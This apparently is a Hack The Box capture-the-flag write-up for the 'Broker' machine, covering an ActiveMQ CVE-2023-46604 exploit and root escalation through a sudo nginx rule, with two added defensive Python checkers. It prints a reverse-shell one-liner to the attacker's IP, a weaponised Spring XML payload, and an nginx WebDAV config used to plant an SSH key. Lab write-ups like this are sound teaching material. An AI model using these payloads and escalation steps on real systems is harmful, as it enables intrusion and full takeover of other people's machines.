Broker https://app.hackthebox.com/machines/Broker
Nmap scan
```
PORT      STATE SERVICE    REASON  VERSION
22/tcp    open  ssh        syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp    open  http       syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Error 401 Unauthorized
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
1883/tcp  open  mqtt       syn-ack
|_mqtt-subscribe: Failed to receive control packet from server.
5672/tcp  open  amqp?      syn-ack
|_amqp-info: ERROR: AQMP:handshake expected header (1) frame, but was 65
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, GetRequest, HTTPOptions, RPCCheck, RTSPRequest, SSLSessionReq, TerminalServerCookie:
|     AMQP
|     AMQP
|     amqp:decode-error
|_    7Connection from client using unsupported AMQP attempted
8161/tcp  open  http       syn-ack Jetty 9.4.39.v20210325
|_http-server-header: Jetty(9.4.39.v20210325)
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_  basic realm=ActiveMQRealm
|_http-title: Error 401 Unauthorized
40299/tcp open  tcpwrapped syn-ack
61613/tcp open  stomp      syn-ack Apache ActiveMQ
| fingerprint-strings:
|   HELP4STOMP:
|     ERROR
|     content-type:text/plain
|     message:Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolException: Unknown STOMP action: HELP
|     org.apache.activemq.transport.stomp.ProtocolConverter.onStompCommand(ProtocolConverter.java:258)
|     org.apache.activemq.transport.stomp.StompTransportFilter.onCommand(StompTransportFilter.java:85)
|     org.apache.activemq.transport.TransportSupport.doConsume(TransportSupport.java:83)
|     org.apache.activemq.transport.tcp.TcpTransport.doRun(TcpTransport.java:233)
|     org.apache.activemq.transport.tcp.TcpTransport.run(TcpTransport.java:215)
|_    java.lang.Thread.run(Thread.java:750)
61614/tcp open  http       syn-ack Jetty 9.4.39.v20210325
|_http-server-header: Jetty(9.4.39.v20210325)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
|_http-title: Site doesn't have a title.
| http-methods:
|   Supported Methods: GET HEAD TRACE OPTIONS
|_  Potentially risky methods: TRACE
61616/tcp open  apachemq   syn-ack ActiveMQ OpenWire transport
| fingerprint-strings:
|   NULL:
|     ActiveMQ
|     TcpNoDelayEnabled
|     SizePrefixDisabled
|     CacheSize
|     ProviderName
|     ActiveMQ
|     StackTraceEnabled
|     PlatformDetails
|     Java
|     CacheEnabled
|     TightEncodingEnabled
|     MaxFrameSize
|     MaxInactivityDuration
|     MaxInactivityDurationInitalDelay
|     ProviderVersion
|_    5.15.15
```
This machine has 3 HTTP ports open: 80, 8161 and 61614.
```
└─➜ cat ports.scan | grep 'http ' [0]
80/tcp open http syn-ack nginx 1.18.0 (Ubuntu)
8161/tcp open http syn-ack Jetty 9.4.39.v20210325
61614/tcp open http syn-ack Jetty 9.4.39.v20210325
```
Visiting the $IP, we are met with HTTP Basic Authentication (realm ActiveMQRealm).
We logged in with the default credentials admin:admin.
The interesting port was 61616/tcp (apachemq, syn-ack, ActiveMQ OpenWire transport), which was running the ActiveMQ OpenWire transport.
The OpenWire banner in the scan reports ProviderVersion 5.15.15, which is affected by CVE-2023-46604, the OpenWire protocol marshaller RCE used below.
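Before reaching for a PoC, a defender (or a pentester writing the report) wants to confirm the version really predates the fix. The following Python is an added example, not part of the writeup: it pulls ProviderVersion out of the nmap fingerprint-strings block above and compares it against the fixed releases named in the CVE-2023-46604 advisory (5.15.16, 5.16.7, 5.17.6, 5.18.3). The scan excerpt embedded below is copied from the page's own output.

```python
import re

# Fixed releases per the CVE-2023-46604 advisory, keyed by minor branch.
# Anything older on the same branch (or any branch before 5.15) is affected.
FIXED_VERSIONS = {
    (5, 15): (5, 15, 16),
    (5, 16): (5, 16, 7),
    (5, 17): (5, 17, 6),
    (5, 18): (5, 18, 3),
}

# Excerpt of the OpenWire fingerprint block from the nmap scan above.
SAMPLE_SCAN = """61616/tcp open  apachemq   syn-ack ActiveMQ OpenWire transport
| fingerprint-strings:
|   NULL:
|     ActiveMQ
|     ProviderName
|     ActiveMQ
|     ProviderVersion
|_    5.15.15
"""

def parse_version(text):
    """Turn '5.15.15' into (5, 15, 15); reject anything that is not x.y.z."""
    parts = text.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected ActiveMQ version string: {text!r}")
    return tuple(int(p) for p in parts)

def provider_version_from_nmap(scan_text):
    """Return the ProviderVersion value from an nmap fingerprint-strings block.

    nmap prints the WireFormatInfo map as alternating key/value lines, so the
    value is the line that follows the 'ProviderVersion' key.
    """
    tokens = [re.sub(r"^\|_?\s*", "", ln).strip() for ln in scan_text.splitlines()]
    for i, token in enumerate(tokens):
        if token == "ProviderVersion" and i + 1 < len(tokens):
            return tokens[i + 1]
    return None

def is_vulnerable_cve_2023_46604(version):
    """True when the broker version predates the fixed release of its branch."""
    v = parse_version(version)
    branch = v[:2]
    if branch not in FIXED_VERSIONS:
        # Branches before 5.15 never received a fix; later ones shipped with it.
        return branch < (5, 15)
    return v < FIXED_VERSIONS[branch]

if __name__ == "__main__":
    found = provider_version_from_nmap(SAMPLE_SCAN)
    print(found, "vulnerable" if is_vulnerable_cve_2023_46604(found) else "patched")
```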
Exploitation (User)
The command executed on the target is a reverse shell back to our listener on 10.10.16.10:9999:
```
sh -i >& /dev/tcp/10.10.16.10/9999 0>&1
```
I've used the following PoC:
https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell-Apache-ActiveMQ
Change the poc-linux.xml file:
```xml
<?xml version="1.0" encoding="UTF-8" ?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
  <!-- Spring instantiates this bean and calls start(), i.e. ProcessBuilder.start() -->
  <bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <!-- The command below opens a reverse shell to <YOUR_IP>:9999 -->
        <value>sh -i >& /dev/tcp/<YOUR_IP>/9999 0>&1</value>
      </list>
    </constructor-arg>
  </bean>
</beans>
```
Start a Python web server with `python -m http.server 8001` to host the XML, then run the PoC:
```
go run main.go -i 10.10.11.243 -p 61616 -u http://10.10.16.10:8001/poc-linux.xml
```
Exploitation (Root)
```
activemq@broker:~$ sudo -l
Matching Defaults entries for activemq on broker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User activemq may run the following commands on broker:
    (ALL : ALL) NOPASSWD: /usr/sbin/nginx
```
So we can run nginx as root with any config file we like (`-c`), i.e. we can start a web server on the box that runs with root privileges.
Refer to the following docs to create a web server:
```
activemq@broker:/tmp$ cat heap.conf
user root;
worker_processes auto;
pid /run/nginx6767.pid;
include /etc/nginx/modules-enabled/*.conf;

events {
    worker_connections 768;
}

http {
    server {
        listen 7878;
        location / {
            root /;
            autoindex on;
        }
    }
}
```
And start the nginx server with the following command:
```
sudo nginx -c /tmp/heap.conf
```
```
activemq@broker:/tmp$ curl localhost:7878/root/
<html>
<head><title>Index of /root/</title></head>
<body>
<h1>Index of /root/</h1><hr><pre><a href="../">../</a>
<a href="cleanup.sh">cleanup.sh</a>        07-Nov-2023 08:15      517
<a href="root.txt">root.txt</a>            10-Nov-2023 06:11       33
</pre><hr></body>
</html>
activemq@broker:/tmp$
```
Since the worker runs as root, we can read root's files (root.txt) straight from the listing.
Beyond root (ippsec way)
If we can create our own server, let's create one that also lets us upload files.
The docs linked above describe the dav_methods directive, which enables WebDAV write methods such as PUT:
```
location / {
    root /;
    dav_methods PUT;
}
```
Let's put our public key in /root/.ssh/authorized_keys:
```
curl -X PUT http://10.10.11.243:7457/root/.ssh/authorized_keys \
    --upload-file ~/.ssh/id_rsa.pub
```
Replace the port (7457) with the port number you used when creating the nginx server.
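The two nginx fragments above are exactly what a `NOPASSWD: /usr/sbin/nginx` sudo rule lets an unprivileged user load. As an added example that is not part of the writeup, the Python below audits an nginx config for the directives that make such a file dangerous: `user root`, a document root of `/`, `autoindex on`, and WebDAV write methods. The sample configs embedded in the block are the ones shown on this page plus a constructed benign one.

```python
import re

# ngx_http_dav_module methods that let an HTTP client modify the served tree.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "COPY", "MOVE"}

# heap.conf from the page (read-only listing of the whole filesystem as root).
HEAP_CONF = """user root;
worker_processes auto;
pid /run/nginx6767.pid;
events { worker_connections 768; }
http { server { listen 7878; location / { root /; autoindex on; } } }
"""
# The WebDAV variant from the page.
DAV_CONF = "user root;\nhttp { server { listen 7878; location / { root /; dav_methods PUT; } } }\n"
# Constructed benign config for comparison.
SAFE_CONF = "user www-data;\nhttp { server { listen 80; root /var/www/html; } }\n"

def directives(conf_text):
    """Return (name, [args]) for every simple directive at any nesting depth.

    Comments are stripped first. Block openers such as 'http {' never match
    because the argument class excludes braces, so only leaf directives remain.
    """
    text = re.sub(r"#.*", "", conf_text)
    return [(m.group(1), m.group(2).split())
            for m in re.finditer(r"(\w+)\s+([^;{}]*?)\s*;", text)]

def audit_nginx_conf(conf_text):
    """Return human-readable findings; an empty list means nothing flagged."""
    findings = []
    ds = directives(conf_text)
    if any(a[:1] == ["root"] for n, a in ds if n == "user"):
        findings.append("user root: worker processes run as uid 0")
    if any(a == ["/"] for n, a in ds if n == "root"):
        findings.append("root /: the entire filesystem is the document root")
    if any(a == ["on"] for n, a in ds if n == "autoindex"):
        findings.append("autoindex on: directory listings are enabled")
    for n, a in ds:
        if n == "dav_methods" and WRITE_METHODS & set(a):
            findings.append(f"dav_methods {' '.join(a)}: clients can write under the document root")
    return findings

if __name__ == "__main__":
    for name, conf in [("heap.conf", HEAP_CONF), ("dav", DAV_CONF), ("safe", SAFE_CONF)]:
        print(name, audit_nginx_conf(conf) or ["no findings"])
```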
Let's check that our key has been placed:
```
activemq@broker:/tmp$ curl localhost:7878/root/.ssh/
<html>
<head><title>Index of /root/.ssh/</title></head>
<body>
<h1>Index of /root/.ssh/</h1><hr><pre><a href="../">../</a>
<a href="authorized_keys">authorized_keys</a>        10-Nov-2023 10:36      741
</pre><hr></body>
</html>
activemq@broker:/tmp$
```
As we can see, our key is in place; now just ssh in and we have a rooooooooot shell.
```
└─➜ ssh root@10.10.11.243 [0]
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-88-generic x86_64)
<-- snipped -->
Last login: Fri Nov 10 10:40:14 2023 from 10.10.14.51
root@broker:~# id
uid=0(root) gid=0(root) groups=0(root)
root@broker:~#
```
PWNED
_______________________heapbytes's still pwning.